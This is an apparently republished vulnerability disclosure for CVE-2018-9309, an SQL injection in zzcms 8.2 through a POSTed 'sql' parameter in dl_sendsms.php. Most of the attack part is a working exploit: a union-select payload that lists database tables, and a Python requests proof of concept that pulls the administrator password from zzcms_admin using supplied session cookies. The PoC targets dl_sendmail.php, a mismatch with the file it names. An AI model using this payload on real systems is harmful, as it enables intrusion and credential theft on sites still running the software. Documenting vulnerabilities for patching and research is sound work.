Headline

CVE-2018-9309: vulnerability/dl_sendsms.php.md at master · lihonghuyang/vulnerability

An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request.

6 years ago

CVE

Open in Source

#sql #vulnerability #php

/dl/dl_sendsms.php****Edition

zzcms 8.2

Location

/dl/dl_sendsms.php

Code

$sql2=$sql." order by id asc limit $n,$size";

Rows:73****Harm

can get password through SQL injection

Cause the cause Take a look at the logic of the bug,If the POST request is not empty, the $sql value will be equal to $_POST[“sql”], $sql will be assigned to $sql2, $sql2=$sql." order by id asc limit $n,$size";

$sql not added ' ' This will cause SQL inject

Construct payload verification

sql=select email from zzcms_dl where id=-1 union select group_concat(distinct table_name) from information_schema.columns where table_schema=database()#

poc

import requests import string

url = “http://192.168.199.23/dl/dl_sendmail.php” cookies = { 'UserName’:’1234’,’PassWord’:’81dc9bdb52d04dc20036dbd8313ed055’} flag = ‘’

data = { ‘sql’:’select email from zzcms_dl where id=-1 union select pass from zzcms_admin #’ }

r = requests.post(url,data,cookies=cookies) r.encoding = ‘utf-8’ print(r.text)

[6]

Get the administrator password

[6]: ./images/6.png “6”